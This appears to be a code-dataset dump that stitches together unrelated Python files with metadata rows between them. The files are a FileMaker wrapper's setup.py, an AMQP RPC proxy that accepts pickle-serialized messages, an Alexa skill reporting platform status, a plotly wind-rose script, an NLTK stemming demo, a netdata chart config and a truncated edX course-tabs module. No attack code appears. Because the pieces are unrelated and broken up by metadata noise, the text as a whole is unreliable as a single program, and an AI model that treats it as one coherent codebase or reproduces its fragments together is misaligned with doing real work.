| mit | 3,966,293,941,133,073,400 | 35.534884 | 140 | 0.629535 | false |
basictheprogram/PyFileMaker | setup.py | 1 | 1184 | #!/usr/bin/env python
from setuptools import setup
from PyFileMaker import __version__, __doc__
setup(
name='PyFileMaker',
version=__version__,
description='Python Object Wrapper for FileMaker Server XML Interface',
long_description=__doc__,
classifiers=[
'Development Status :: 4 - Beta',
'Environment :: Console',
'Intended Audience :: Developers',
'Intended Audience :: System Administrators',
'License :: OSI Approved :: BSD License',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Topic :: Database :: Database Engines/Servers',
'Topic :: Software Development :: Libraries :: Python Modules',
],
keywords=['FileMaker'],
author='Klokan Petr Pridal, Pieter Claerhout, Marcin Kawa',
author_email='klokan@klokan.cz, pieter@yellowduck.be, kawa.macin@gmail.com',
url='https://github.com/aeguana/PyFileMaker',
download_url='https://github.com/aeguana/PyFileMaker/releases',
license='http://www.opensource.org/licenses/bsd-license.php',
platforms = ['any'],
packages=['PyFileMaker'],
install_requires=['requests'],
)
| bsd-3-clause | -3,609,229,219,232,858,600 | 37.193548 | 80 | 0.651182 | false |
entropyx/callme | callme/proxy.py | 1 | 9608 | # Copyright (c) 2009-2014, Christian Haintz
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
#
# * Neither the name of callme nor the names of its contributors
# may be used to endorse or promote products derived from this
# software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import logging
import socket
import time
import uuid
import kombu
from callme import base
from callme import exceptions as exc
from callme import protocol as pr
LOG = logging.getLogger(__name__)
REQUEST_TIMEOUT = 60
class Proxy(base.Base):
"""This Proxy class is used to handle the communication with the rpc
server.
    :keyword server_exchange_name: the server exchange name (can be declared later
see :func:`use_server`)
:keyword amqp_host: the host of where the AMQP Broker is running
:keyword amqp_user: the username for the AMQP Broker
:keyword amqp_password: the password for the AMQP Broker
:keyword amqp_vhost: the virtual host of the AMQP Broker
:keyword amqp_port: the port of the AMQP Broker
:keyword ssl: use SSL connection for the AMQP Broker
:keyword timeout: default timeout for calls in seconds
:keyword durable: make all exchanges and queues durable
:keyword auto_delete: delete server queues after all connections are closed
not applicable for client queues
"""
def __init__(self,
server_exchange_name,
server_queue_name=None,
server_routing_key=None,
amqp_host='localhost',
amqp_user='guest',
amqp_password='guest',
amqp_vhost='/',
amqp_port=5672,
ssl=False,
timeout=REQUEST_TIMEOUT,
durable=False,
auto_delete=True,
):
super(Proxy, self).__init__(amqp_host, amqp_user, amqp_password,
amqp_vhost, amqp_port, ssl)
self._uuid = str(uuid.uuid4())
self._server_exchange_name = server_exchange_name
self._server_queue_name = server_queue_name
self._server_routing_key = server_routing_key
self._timeout = timeout
self._is_received = False
self._corr_id = None
self._response = None
self._exchange_name = 'client_{0}_ex_{1}'.format(self._server_exchange_name, self._uuid)
self._queue_name = 'client_{0}_queue_{1}'.format(self._server_queue_name, self._uuid) if self._server_queue_name else ''
self._durable = durable
self._auto_delete = auto_delete
# create queue
queue = self._make_queue(self._queue_name, None,
durable=self._durable,
auto_delete=True)
# create consumer
consumer = kombu.Consumer(channel=self._conn,
queues=queue,
callbacks=[self._on_response],
accept=['pickle'])
consumer.consume()
def use_server(self, exchange_name=None, queue_name=None, timeout=None):
"""Use the specified server and set an optional timeout for the method
call.
Typical use:
>> my_proxy.use_server('foo_exchange','foo.receive').a_remote_func()
:keyword exchange_name: the exchange_name where the call will be made
:keyword queue_name: the queue_name where the call will be made
:keyword timeout: set or overrides the call timeout in seconds
:rtype: return `self` to cascade further calls
"""
if exchange_name is not None:
            self._server_exchange_name = exchange_name
        if queue_name is not None:
            self._server_queue_name = queue_name
if timeout is not None:
self._timeout = timeout
return self
def _on_response(self, response, message):
"""This method is automatically called when a response is incoming and
decides if it is the message we are waiting for - the message with the
result.
:param response: the body of the amqp message already deserialized
by kombu
:param message: the plain amqp kombu.message with additional
information
"""
LOG.debug("Got response: {0}".format(response))
try:
message.ack()
except Exception:
LOG.exception("Failed to acknowledge AMQP message.")
else:
LOG.debug("AMQP message acknowledged.")
# check response type
if not isinstance(response, pr.RpcResponse):
LOG.warning("Response is not a `RpcResponse` instance.")
return
# process response
try:
if self._corr_id == message.properties['correlation_id']:
self._response = response
self._is_received = True
except KeyError:
LOG.error("Message has no `correlation_id` property.")
def __request(self, func_name, func_args, func_kwargs):
"""The remote-method-call execution function.
:param func_name: name of the method that should be executed
:param func_args: arguments for the remote-method
:param func_kwargs: keyword arguments for the remote-method
:type func_name: string
:type func_args: list of parameters
:rtype: result of the method
"""
self._corr_id = str(uuid.uuid4())
request = pr.RpcRequest(func_name, func_args, func_kwargs)
LOG.debug("Publish request: {0}".format(request))
# publish request
with kombu.producers[self._conn].acquire(block=True) as producer:
type = 'topic'
exchange = self._make_exchange(
self._server_exchange_name,
type=type,
durable=self._durable,
auto_delete=self._auto_delete)
producer.publish(body=request,
serializer='pickle',
exchange=exchange,
reply_to=self._queue_name,
correlation_id=self._corr_id,
routing_key=self._server_routing_key)
# start waiting for the response
self._wait_for_result()
self._is_received = False
# handler response
result = self._response.result
LOG.debug("Result: {!r}".format(result))
if self._response.is_exception:
raise result
return result
def _wait_for_result(self):
"""Waits for the result from the server, checks every second if
a timeout occurred. If a timeout occurred - the `RpcTimeout` exception
will be raised.
"""
start_time = time.time()
while not self._is_received:
try:
self._conn.drain_events(timeout=1)
except socket.timeout:
if self._timeout > 0:
if time.time() - start_time > self._timeout:
raise exc.RpcTimeout("RPC Request timeout")
def __getattr__(self, name):
"""This method is invoked, if a method is being called, which doesn't
exist on Proxy. It is used for RPC, to get the function which should
be called on the Server.
"""
# magic method dispatcher
LOG.debug("Recursion: {0}".format(name))
return _Method(self.__request, name)
# ===========================================================================
class _Method(object):
"""This class is used to realize remote-method-calls.
:param send: name of the function that should be executed on Proxy
:param name: name of the method which should be called on the Server
"""
# some magic to bind an XML-RPC method to an RPC server.
# supports "nested" methods (e.g. examples.getStateName)
def __init__(self, send, name):
self._send = send
self._name = name
def __getattr__(self, name):
return _Method(self._send, "{0}.{1}".format(self._name, name))
def __call__(self, *args, **kw):
return self._send(self._name, args, kw)
# ===========================================================================
| bsd-3-clause | 4,423,005,917,173,876,700 | 38.216327 | 128 | 0.600125 | false |
Signiant/alexa_signiant_status | alexa_signiant_status.py | 1 | 11159 | """
Return Signiant Platform Status
"""
import time
import urllib.request, urllib.error, urllib.parse
import json
import os
# Default Signiant Status Page URL
SIGNIANT_STATUS_URL = 'https://1dmtgkjnl3y3.statuspage.io/api/v2/summary.json'
STATUS_PAGE_API_KEY = None
# We need this to be set as an env var - fail if it's not
if 'applicationId' in os.environ:
APPLICATION_ID = os.environ['applicationId']
else:
raise ValueError("No Application ID provided")
if 'statusPageUrl' in os.environ:
SIGNIANT_STATUS_URL = os.environ['statusPageUrl']
if 'statusPageApiKey' in os.environ:
STATUS_PAGE_API_KEY = os.environ['statusPageApiKey']
def get_raw_component_status():
'''
:return: list of services with their info
'''
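    # Fetch the statuspage.io v2 summary JSON (adding an OAuth header when an API
    # key is configured) and return the raw "components" list.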
sig_components = []
request = urllib.request.Request(SIGNIANT_STATUS_URL)
if STATUS_PAGE_API_KEY:
request.add_header("Authorization", "OAuth %s" % STATUS_PAGE_API_KEY)
r = urllib.request.urlopen(request, timeout=2)
if r.getcode() == 200:
response = json.load(r)
if 'components' in response:
sig_components = response['components']
return sig_components
def get_signiant_status():
raw_status_list = get_raw_component_status()
# {
# "status": "operational",
# "name": "v1",
# "created_at": "2016-10-21T14:20:42.069Z",
# "updated_at": "2016-12-02T20:54:28.202Z",
# "position": 1,
# "description": "Backend services for TAPIv1",
# "group_id": "1234567890",
# "showcase": false,
# "id": "2345678901",
# "page_id": "123abc456def",
# "group": false,
# "only_show_if_degraded": false
# }
# Find the groups
groups = {}
for component in raw_status_list:
if component['group']:
groups[component['id']] = component['name']
# Get statuses
signiant_services = {}
for service in raw_status_list:
if service['group_id']:
# This is part of a group - get the group's name
name = groups[service['group_id']] + ' ' + service['name']
status = service['status']
signiant_services[name] = {'status': status}
return signiant_services
def convert_status_to_readable(status):
if 'degraded_performance' in status:
return "degraded performance"
elif 'major_outage' in status:
return "major outage"
elif 'partial_outage' in status:
return "partial outage"
elif 'under_maintenance' in status:
return "under maintenance"
else:
return status
# ------------------------------ SSML Helpers ---------------------------------
def pause(duration=1000):
return '<break time="' + str(duration) + 'ms"/>'
def say_as(interpret_as, msg):
return '<say-as interpret-as="' + interpret_as + '"> ' + str(msg) + '</say-as>'
def handle_audio(url):
return "<audio src='" + url + "' />"
# --------------- Helpers that build all of the responses ----------------------
def build_speechlet_response(title, output, card_output, reprompt_text="",
card_image_small=None, card_image_large=None,
should_end_session=False):
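    # Assemble the Alexa response payload: SSML speech, a Simple or Standard card
    # (Standard when card images are supplied), and an SSML reprompt.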
outputSpeech = {
'type': 'SSML',
'ssml': "<speak>" + output + "</speak>"
}
card = {}
card['title'] = title
if card_image_small or card_image_large:
card['type'] = 'Standard'
card['text'] = card_output
card['image'] = {}
if card_image_small:
card['image']['smallImageUrl'] = card_image_small
if card_image_large:
card['image']['largeImageUrl'] = card_image_large
else:
card['type'] = 'Simple'
card['content'] = card_output
reprompt = {
'outputSpeech': {
'type': 'SSML',
'ssml': "<speak>" + reprompt_text + "</speak>"
}
}
return {
'outputSpeech': outputSpeech,
'card': card,
'reprompt': reprompt,
'shouldEndSession': should_end_session
}
def build_response(session_attributes, speechlet_response):
return {
'version': '1.0',
'sessionAttributes': session_attributes,
'response': speechlet_response
}
# --------------- Functions that control the skill's behavior ------------------
def get_help_response():
card_title = "Signiant Help"
speech_output = "To request information about Signiant Platform Status, say status report" + pause() \
+ "What can I help you with?"
reprompt_text = "What can I help you with?"
return build_response({}, build_speechlet_response(
card_title, speech_output, speech_output, reprompt_text, should_end_session=False))
def get_welcome_response():
session_attributes = {}
return get_status()
def handle_session_end_request():
card_title = "Session Ended"
speech_output = "Thank you."
return build_response({}, build_speechlet_response(
card_title, speech_output, speech_output, should_end_session=True))
def general_status():
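    # Build both the spoken status summary and the plain-text card: the card lists
    # every service, while the speech calls out only services that are not
    # 'operational' and then notes whether the remaining services are healthy.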
signiant_stats = get_signiant_status()
# Get the number of services
no_signiant_services = len(signiant_stats)
signiant_problems = []
for service in signiant_stats:
        if 'operational' not in signiant_stats[service]['status']:
signiant_problems.append((service, signiant_stats[service]['status']))
today = time.strftime("%A %B %d %Y")
now = time.strftime("%X UTC")
card_output = "Current Signiant Platform Status report for " + today + ' at ' + now + '\n'
for service in signiant_stats:
card_output += service + ': ' + signiant_stats[service]['status'] + '\n'
card_output += "For more information, please visit status.signiant.com"
speech_output = "Current Signiant Platform Status report for " + today + pause()
if len(signiant_problems) > 0:
# We've got a problem
for service, status in signiant_problems:
speech_output += service + ' has a status of ' + convert_status_to_readable(status) + pause()
if len(signiant_problems) < no_signiant_services:
speech_output += "All other services are operating normally" + pause()
speech_output += "For more information, please visit status.signiant.com"
else:
speech_output += "All services operating normally"
return speech_output, card_output
def get_status():
session_attributes = {}
card_title = "Signiant Platform Status"
speech_output, card_output = general_status()
return build_response(session_attributes, build_speechlet_response(
card_title, speech_output, card_output, should_end_session=True))
def get_media_shuttle():
session_attributes = {}
card_title = "Signiant Media Shuttle"
speech_output = "Media Shuttle is a SaaS solution that allows anyone to quickly and securely transfer any size file anywhere in the world"
card_output = "Media Shuttle is a SaaS solution that allows anyone to quickly and securely transfer any size file anywhere in the world."
return build_response(session_attributes, build_speechlet_response(
card_title, speech_output, card_output, should_end_session=True))
def get_flight():
session_attributes = {}
card_title = "Signiant Flight"
speech_output = 'Flight is an auto scaling SaaS utility that accelerates the transfer of large files in and out of cloud object storage'
card_output = "Flight is an auto scaling SaaS utility that accelerates the transfer of large data sets into and out of cloud object storage."
return build_response(session_attributes, build_speechlet_response(
card_title, speech_output, card_output, should_end_session=True))
def get_managers_and_agents():
session_attributes = {}
card_title = "Signiant Managers+Agents"
speech_output = "Managers and Agents software enables the automated delivery of large files across geographically dispersed locations"
card_output = "Managers+Agents software enables the automated delivery of large files across geographically dispersed locations."
return build_response(session_attributes, build_speechlet_response(
card_title, speech_output, card_output, should_end_session=True))
# --------------- Events ------------------
def on_session_started(session_started_request, session):
"""
Called when the session starts
"""
print("on_session_started requestId=" + session_started_request['requestId']
+ ", sessionId=" + session['sessionId'])
def on_launch(launch_request, session):
"""
Called when the user launches the skill without specifying what they want
"""
print("on_launch requestId=" + launch_request['requestId'] +
", sessionId=" + session['sessionId'])
# Dispatch to your skill's launch
return get_welcome_response()
def on_intent(intent_request, session):
"""
Called when the user specifies an intent for this skill
"""
print("on_intent requestId=" + intent_request['requestId'] +
", sessionId=" + session['sessionId'])
intent = intent_request['intent']
intent_name = intent_request['intent']['name']
# Dispatch to your skill's intent handlers
if intent_name == "GetStatus":
return get_status()
elif intent_name == "GetMediaShuttle":
return get_media_shuttle()
elif intent_name == "GetFlight":
return get_flight()
elif intent_name == "GetManagersAndAgents":
return get_managers_and_agents()
elif intent_name == "AMAZON.HelpIntent":
return get_help_response()
elif intent_name == "AMAZON.CancelIntent" or intent_name == "AMAZON.StopIntent":
return handle_session_end_request()
else:
raise ValueError("Invalid intent")
def on_session_ended(session_ended_request, session):
"""
Called when the user ends the session.
Is not called when the skill returns should_end_session=true
"""
print("on_session_ended requestId=" + session_ended_request['requestId'] +
", sessionId=" + session['sessionId'])
# --------------- Main handler ------------------
def lambda_handler(event, context):
"""
Route the incoming request based on type (LaunchRequest, IntentRequest,
etc.) The JSON body of the request is provided in the event parameter.
"""
print("event.session.application.applicationId=" +
event['session']['application']['applicationId'])
if (event['session']['application']['applicationId'] != APPLICATION_ID):
raise ValueError("Invalid Application ID")
if event['session']['new']:
on_session_started({'requestId': event['request']['requestId']},
event['session'])
if event['request']['type'] == "LaunchRequest":
return on_launch(event['request'], event['session'])
elif event['request']['type'] == "IntentRequest":
return on_intent(event['request'], event['session'])
elif event['request']['type'] == "SessionEndedRequest":
return on_session_ended(event['request'], event['session'])
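# Illustrative sketch (not part of the original handler): a minimal event for
# exercising the routing above locally. The applicationId, requestId and
# sessionId below are hypothetical placeholders; the applicationId would have
# to match the APPLICATION_ID configured for this skill.
#
# sample_event = {
#     'session': {'new': True, 'sessionId': 'session-0001',
#                 'application': {'applicationId': 'amzn1.ask.skill.example'}},
#     'request': {'type': 'LaunchRequest', 'requestId': 'request-0001'},
# }
# lambda_handler(sample_event, context=None)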
| mit | 2,951,908,603,387,607,000 | 33.441358 | 145 | 0.631419 | false |
zrhans/pythonanywhere | pyscripts/ply_wrose.py | 1 | 1678 | """
DATA,Chuva,Chuva_min,Chuva_max,VVE,VVE_min,VVE_max,DVE,DVE_min,DVE_max,Temp.,Temp._min,Temp._max,Umidade,Umidade_min,Umidade_max,Rad.,Rad._min,Rad._max,Pres.Atm.,Pres.Atm._min,Pres.Atm._max,Temp.Int.,Temp.Int._min,Temp.Int._max,CH4,CH4_min,CH4_max,HCnM,HCnM_min,HCnM_max,HCT,HCT_min,HCT_max,SO2,SO2_min,SO2_max,O3,O3_min,O3_max,NO,NO_min,NO_max,NO2,NO2_min,NO2_max,NOx,NOx_min,NOx_max,CO,CO_min,CO_max,MP10,MP10_min,MP10_max,MPT,MPT_min,MPT_max,Fin,Fin_min,Fin_max,Vin,Vin_min,Vin_max,Vout,Vout_min,Vout_max
"""
import plotly.plotly as py # Every function in this module will communicate with an external plotly server
import plotly.graph_objs as go
import pandas as pd
DATAFILE = r'/home/zrhans/w3/bns/bns_2016-1.csv'
df = pd.read_csv(DATAFILE, parse_dates=True, sep=',', header=0, index_col='DATA')
x = df.DVE
y = df.VVE
#print(y)
# Defining the data series
trace1 = go.Area(
r = y,#["2015-12-01","2015-12-01 01:00:00","2015-12-01 02:00:00","2015-12-01 03:00:00","2015-12-01 04:00:00","2015-12-01 05:00:00"],
t = x,#[74.73,76.59,76.5,79.03,77.89,81.9,],
name='Vento m/s',
marker=dict(
color='rgb(158,154,200)'
)
)
# Edit the layout
layout = go.Layout(
title='Distribuição da Velocidade do Vento no diagrama Laurel',
font = dict(size=16),
radialaxis=dict(
ticksuffix='m/s'
),
orientation=270
)
data = [trace1]
fig = go.Figure(data=data, layout=layout)
# Plotting the figure
py.plot(
fig,
filename='hans/oi_wrose', # name of the file as saved in your plotly account
sharing='public'
) # 'public' | 'private' | 'secret': Learn more: https://plot.ly/python/privacy
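# Note (illustrative, assuming the offline module shipped with this plotly version):
# to render locally instead of publishing to the Plotly cloud, the same figure can
# be written to an HTML file, e.g.:
# import plotly.offline
# plotly.offline.plot(fig, filename='oi_wrose.html', auto_open=False)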
| apache-2.0 | 3,732,984,452,064,682,000 | 32.52 | 507 | 0.665274 | false |
MingjunZhou/nltk_book | ch3_Processing_Raw_Text/normalizing_text.py | 1 | 1438 | import nltk
class IndexedText(object):
def __init__(self, stemmer, text):
self._text = text
self._stemmer = stemmer
self._index = nltk.Index((self._stem(word), i)
for (i, word) in enumerate(text))
def concordance(self, word, width=40):
key = self._stem(word)
wc = width / 4 # words of context
for i in self._index[key]:
lcontext = ' '.join(self._text[i-wc:i])
rcontext = ' '.join(self._text[i:i+wc])
ldisplay = '%*s' % (width, lcontext[-width:])
rdisplay = '%-*s' % (width, rcontext[:width])
print ldisplay, rdisplay
def _stem(self, word):
return self._stemmer.stem(word).lower()
if __name__ == "__main__":
raw = """DENNIS: Listen, strange women lying in ponds distributing swords
is no basis for a system of government. Supreme executive power derives from
a mandate from the masses, not from some farcical aquatic ceremony."""
tokens = nltk.word_tokenize(raw)
porter = nltk.PorterStemmer()
lancaster = nltk.LancasterStemmer()
print [porter.stem(t) for t in tokens]
print [lancaster.stem(t) for t in tokens]
grail = nltk.corpus.webtext.words('grail.txt')
text = IndexedText(porter, grail)
text.concordance('lie')
# lemmatization
wnl = nltk.WordNetLemmatizer()
print [wnl.lemmatize(t) for t in tokens]
| bsd-3-clause | 3,717,364,423,540,974,000 | 34.073171 | 85 | 0.595967 | false |
3cky/netdata | collectors/python.d.plugin/ssg_nodes/ssg_nodes.chart.py | 1 | 4025 | import json
from third_party.osgi_monitor import OsgiMonitorService
# default module values (can be overridden per job in `config`)
update_every = 10
priority = 60000
retries = 60
ORDER = ['datasource.pool', 'datasource.perf', 'conn.service', 'conn.auth', 'auth.service', \
'game.tables', 'game.authz', 'game.pool', 'game.perf', \
'tournament.pool', 'tournament.perf']
CHARTS = {
'datasource.pool': {
'options': [None, 'Connections', 'connections', 'DataSource (pool)', 'ssg.datasource.pool', 'area'],
'lines': [
['datasource.pool.busy', 'busy'],
['datasource.pool.size', 'size'],
['datasource.pool.total', 'pooled']
]},
'datasource.perf': {
'options': [None, 'Connections/s', 'connections/s', 'DataSource (perf)', 'ssg.datasource.perf', 'area'],
'lines': [
['datasource.pool.picked', 'conn/s', 'incremental']
]},
'conn.service': {
'options': [None, 'Connections', 'connections', 'Connections (all)', 'ssg.conn.service', 'area'],
'lines': [
['connection.number.total', 'total'],
['connection.number.local', 'local']
]},
'conn.auth': {
'options': [None, 'Connections', 'connections', 'Connections (auth)', 'ssg.conn.auth', 'area'],
'lines': [
['offline.user.registry.size', 'offline'],
['auth.user.registry.size', 'total'],
['local.auth.user.registry.size', 'local']
]},
'auth.service': {
'options': [None, 'Authenticated', 'authenticated', 'Authentication', 'ssg.auth.service', 'area'],
'lines': [
['auth.session.number', 'sessions'],
['auth.user.number', 'users']
]},
'game.tables': {
'options': [None, 'Tables', 'tables', 'Game (tables)', 'ssg.game.tables', 'area'],
'lines': [
['game.service.tables.local.active', 'active'],
['game.service.tables.total', 'total'],
['game.service.tables.local.total', 'local']
]},
'game.authz': {
'options': [None, 'Participants', 'participants', 'Game (authz)', 'ssg.game.authz', 'area'],
'lines': [
['game.service.authz.active', 'active'],
['game.service.authz.total', 'total'],
['game.service.authz.active.m_1', 'battleship'],
['game.service.authz.active.m_2', 'checkers'],
['game.service.authz.active.m_5', 'durak'],
['game.service.authz.active.m_6', 'chess'],
['game.service.authz.active.m_9', 'gammon'],
['game.service.authz.active.m_11', 'poker'],
['game.service.authz.active.m_14', 'thousand'],
['game.service.authz.active.m_15', 'burkozel']
]},
'game.pool': {
'options': [None, 'Threads', 'threads', 'Game (pool)', 'ssg.game.pool', 'area'],
'lines': [
['game.service.pool.size', 'size'],
['game.service.pool.load.avg5min', 'avg5min', 'absolute', 1, 1000]
]},
'game.perf': {
'options': [None, 'Tasks/s', 'tasks/s', 'Game (perf)', 'ssg.game.perf', 'area'],
'lines': [
['game.service.pool.tasks.complete', 'tasks/s', 'incremental']
]},
'tournament.pool': {
'options': [None, 'Threads', 'threads', 'Tournament (pool)', 'ssg.tournament.pool', 'area'],
'lines': [
['tournaments.pool.size', 'size'],
['tournaments.pool.load.avg5min', 'avg5min', 'absolute', 1, 1000]
]},
'tournament.perf': {
'options': [None, 'Tasks/s', 'tasks/s', 'Tournament (perf)', 'ssg.tournament.perf', 'area'],
'lines': [
['tournaments.pool.tasks.complete', 'tasks/s', 'incremental']
]},
}
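# Sketch of how the netdata python.d framework is assumed to read the structures
# above (based on the conventions used by other python.d modules; not verified
# against this plugin's framework version):
#   'options': [name, title, units, family, context, chart_type]
#   'lines':   [dimension_id, dimension_name, algorithm, multiplier, divisor]
# e.g. ['game.service.pool.load.avg5min', 'avg5min', 'absolute', 1, 1000] divides
# the collected value by 1000 before charting it.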
class Service(OsgiMonitorService):
def __init__(self, configuration=None, name=None):
OsgiMonitorService.__init__(self, configuration=configuration, name=name)
self.order = ORDER
self.definitions = CHARTS
| gpl-3.0 | 4,366,254,782,513,067,000 | 40.927083 | 112 | 0.541366 | false |
nttks/jenkins-test | common/lib/xmodule/xmodule/tabs.py | 1 | 35344 | """
Implement CourseTab
"""
# pylint: disable=incomplete-protocol
# Note: pylint complains that we do not implement __delitem__ and __len__, although we implement __setitem__
# and __getitem__. However, the former two do not apply to the CourseTab class so we do not implement them.
# The reason we implement the latter two is to enable callers to continue to use the CourseTab object with
# dict-type accessors.
from abc import ABCMeta, abstractmethod
from xblock.fields import List
# We should only scrape strings for i18n in this file, since the target language is known only when
# they are rendered in the template. So ugettext gets called in the template.
_ = lambda text: text
class CourseTab(object): # pylint: disable=incomplete-protocol
"""
The Course Tab class is a data abstraction for all tabs (i.e., course navigation links) within a course.
It is an abstract class - to be inherited by various tab types.
Derived classes are expected to override methods as needed.
When a new tab class is created, it should define the type and add it in this class' factory method.
"""
__metaclass__ = ABCMeta
# Class property that specifies the type of the tab. It is generally a constant value for a
# subclass, shared by all instances of the subclass.
type = ''
icon = ''
# Class property that specifies whether the tab can be hidden for a particular course
is_hideable = False
# Class property that specifies whether the tab can be moved within a course's list of tabs
is_movable = True
# Class property that specifies whether the tab is a collection of other tabs
is_collection = False
def __init__(self, name, tab_id, link_func):
"""
Initializes class members with values passed in by subclasses.
Args:
name: The name of the tab
tab_id: Intended to be a unique id for this tab, although it is currently not enforced
within this module. It is used by the UI to determine which page is active.
link_func: A function that computes the link for the tab,
given the course and a reverse-url function as input parameters
"""
self.name = name
self.tab_id = tab_id
self.link_func = link_func
def can_display(self, course, settings, is_user_authenticated, is_user_staff, is_user_enrolled): # pylint: disable=unused-argument
"""
Determines whether the tab should be displayed in the UI for the given course and a particular user.
This method is to be overridden by subclasses when applicable. The base class implementation
always returns True.
Args:
course: An xModule CourseDescriptor
settings: The configuration settings, including values for:
WIKI_ENABLED
FEATURES['ENABLE_DISCUSSION_SERVICE']
FEATURES['ENABLE_EDXNOTES']
FEATURES['ENABLE_STUDENT_NOTES']
FEATURES['ENABLE_TEXTBOOK']
is_user_authenticated: Indicates whether the user is authenticated. If the tab is of
type AuthenticatedCourseTab and this value is False, then can_display will return False.
is_user_staff: Indicates whether the user has staff access to the course. If the tab is of
type StaffTab and this value is False, then can_display will return False.
is_user_enrolled: Indicates whether the user is enrolled in the course
Returns:
A boolean value to indicate whether this instance of the tab should be displayed to a
given user for the given course.
"""
return True
def get(self, key, default=None):
"""
Akin to the get method on Python dictionary objects, gracefully returns the value associated with the
given key, or the default if key does not exist.
"""
try:
return self[key]
except KeyError:
return default
def __getitem__(self, key):
"""
This method allows callers to access CourseTab members with the d[key] syntax as is done with
Python dictionary objects.
"""
if key == 'name':
return self.name
elif key == 'type':
return self.type
elif key == 'tab_id':
return self.tab_id
else:
raise KeyError('Key {0} not present in tab {1}'.format(key, self.to_json()))
def __setitem__(self, key, value):
"""
This method allows callers to change CourseTab members with the d[key]=value syntax as is done with
Python dictionary objects. For example: course_tab['name'] = new_name
Note: the 'type' member can be 'get', but not 'set'.
"""
if key == 'name':
self.name = value
elif key == 'tab_id':
self.tab_id = value
else:
raise KeyError('Key {0} cannot be set in tab {1}'.format(key, self.to_json()))
def __eq__(self, other):
"""
Overrides the equal operator to check equality of member variables rather than the object's address.
Also allows comparison with dict-type tabs (needed to support callers implemented before this class
was implemented).
"""
if type(other) is dict and not self.validate(other, raise_error=False):
# 'other' is a dict-type tab and did not validate
return False
# allow tabs without names; if a name is required, its presence was checked in the validator.
name_is_eq = (other.get('name') is None or self.name == other['name'])
# only compare the persisted/serialized members: 'type' and 'name'
return self.type == other.get('type') and name_is_eq
def __ne__(self, other):
"""
Overrides the not equal operator as a partner to the equal operator.
"""
return not (self == other)
@classmethod
def validate(cls, tab_dict, raise_error=True):
"""
Validates the given dict-type tab object to ensure it contains the expected keys.
This method should be overridden by subclasses that require certain keys to be persisted in the tab.
"""
return key_checker(['type'])(tab_dict, raise_error)
def to_json(self):
"""
Serializes the necessary members of the CourseTab object to a json-serializable representation.
This method is overridden by subclasses that have more members to serialize.
Returns:
a dictionary with keys for the properties of the CourseTab object.
"""
return {'type': self.type, 'name': self.name}
@staticmethod
def from_json(tab_dict):
"""
Deserializes a CourseTab from a json-like representation.
The subclass that is instantiated is determined by the value of the 'type' key in the
given dict-type tab. The given dict-type tab is validated before instantiating the CourseTab object.
Args:
            tab_dict: a dictionary with keys for the properties of the tab.
Raises:
InvalidTabsException if the given tab doesn't have the right keys.
"""
sub_class_types = {
'courseware': CoursewareTab,
'course_info': CourseInfoTab,
'wiki': WikiTab,
'discussion': DiscussionTab,
'external_discussion': ExternalDiscussionTab,
'external_link': ExternalLinkTab,
'textbooks': TextbookTabs,
'pdf_textbooks': PDFTextbookTabs,
'html_textbooks': HtmlTextbookTabs,
'progress': ProgressTab,
'static_tab': StaticTab,
'peer_grading': PeerGradingTab,
'staff_grading': StaffGradingTab,
'open_ended': OpenEndedGradingTab,
'notes': NotesTab,
'edxnotes': EdxNotesTab,
'syllabus': SyllabusTab,
'instructor': InstructorTab, # not persisted
}
tab_type = tab_dict.get('type')
if tab_type not in sub_class_types:
raise InvalidTabsException(
'Unknown tab type {0}. Known types: {1}'.format(tab_type, sub_class_types)
)
tab_class = sub_class_types[tab_dict['type']]
tab_class.validate(tab_dict)
return tab_class(tab_dict=tab_dict)
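# Illustrative round trip through the (de)serializers above (a sketch, not part of
# the original module):
#   tab = CourseTab.from_json({'type': 'wiki', 'name': 'Wiki'})   # -> WikiTab instance
#   tab.to_json()                                                 # -> {'type': 'wiki', 'name': 'Wiki'}
#   CourseTab.from_json({'type': 'bogus'})                        # raises InvalidTabsException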
class AuthenticatedCourseTab(CourseTab):
"""
Abstract class for tabs that can be accessed by only authenticated users.
"""
def can_display(self, course, settings, is_user_authenticated, is_user_staff, is_user_enrolled):
return is_user_authenticated
class StaffTab(AuthenticatedCourseTab):
"""
Abstract class for tabs that can be accessed by only users with staff access.
"""
def can_display(self, course, settings, is_user_authenticated, is_user_staff, is_user_enrolled): # pylint: disable=unused-argument
return is_user_staff
class EnrolledOrStaffTab(CourseTab):
"""
Abstract class for tabs that can be accessed by only users with staff access
or users enrolled in the course.
"""
def can_display(self, course, settings, is_user_authenticated, is_user_staff, is_user_enrolled): # pylint: disable=unused-argument
return is_user_authenticated and (is_user_staff or is_user_enrolled)
class HideableTab(CourseTab):
"""
Abstract class for tabs that are hideable
"""
is_hideable = True
def __init__(self, name, tab_id, link_func, tab_dict):
super(HideableTab, self).__init__(
name=name,
tab_id=tab_id,
link_func=link_func,
)
self.is_hidden = tab_dict.get('is_hidden', False) if tab_dict else False
def __getitem__(self, key):
if key == 'is_hidden':
return self.is_hidden
else:
return super(HideableTab, self).__getitem__(key)
def __setitem__(self, key, value):
if key == 'is_hidden':
self.is_hidden = value
else:
super(HideableTab, self).__setitem__(key, value)
def to_json(self):
to_json_val = super(HideableTab, self).to_json()
